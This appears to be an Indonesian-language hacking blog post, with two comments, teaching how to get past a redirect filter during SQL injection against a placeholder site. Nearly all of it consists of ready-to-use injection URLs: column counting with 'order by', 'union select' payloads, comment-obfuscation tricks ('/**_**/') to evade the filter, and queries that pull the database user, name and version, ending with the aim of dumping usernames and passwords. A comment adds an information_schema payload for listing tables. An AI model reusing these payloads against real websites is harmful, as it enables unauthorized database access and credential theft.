Skip to content Skip to sidebar Skip to footer

Widget HTML #1

Bypassing Sql Injection Redirect

Hmm, mumpung lagi ga ada kerjaan nih. Pada kesempatan kali ini gw mau sharing tutorial mengenai sqli yaitu Bypassing Sql Injection Redirect.

Mungkin kalian saat ini sedang mengalami hal seperti ini? Oke mari kita selesaikan problemnya.

Ok lanjut.
Gw udah punya target contoh,
http://site.com/index.php?id=6

Lanjut menginjeksinya.
Sekarang kita akan mencari berapa jumlah column datasbase site tersebut dengan menambahkan perintah order by, tambahkan tanda + untuk spasi. Jadi perintah lengkapnya seperti ini

http://site.com/index.php?id=6+order+by+1-- -

Tapi disini gw saat menambahkan perintah order+by malah site ke redirect. Oke kita bypass seperti ini,

order/**_**/by 1-- - [bypass done]

Setelah bypass berhasil, lalu ganti angka 1 ke angka 2 dan seterusnya sampai menemukan error.
Disini gw menemukan errornya diangka ke 5, berarti jumlah column database ada 4.

Lanjut.
Sekarang masukan perintah union select, ganti order+by dengan union+select+1,2,3,4-- - dan sebelum angka dibelakang url tersebut tambahkan tanda -
Jadi perintah lengkapnya seperi ini,

http://site.com/index.php?id=-6+union+select+1,2,3,4-- -

Lagi-lagi setelah menganti perintah order+by ke perintah union+select site ke redirect, hmmm mari kita bypass

union/**_**/select 1,2,3,4-- - [bypass done]

Setelah bypass sukses, maka nanti akan mendapatkan sebuah angka, dan gw disini dapat angka 2.

Lanjut.
Sekarang coba kita lihat user, database, dan version site tersebut, dengan perintah seperti berikut ini

http://site.com/index.php?id=-6 union/**_**/select 1,user(),0x3a,database(),0x3a,version(),3,4-- -

Hmm ternyata kena redirect lagi, kita bypass lagi seperti berikut ini

user/**_**/(),database/**_**/(),version/**_**/() [bypass done]

Selanjutnya tinggal didump username dan passwordnya.
Sekian dari gw dan semoga bermanfaat.

2 comments for "Bypassing Sql Injection Redirect"

  1. Replies
    1. The way is like this group_concat(table_name) and at the end of the number before the sign - input command like this
      from+information_schema.tables+where+table_schema=database()

      Delete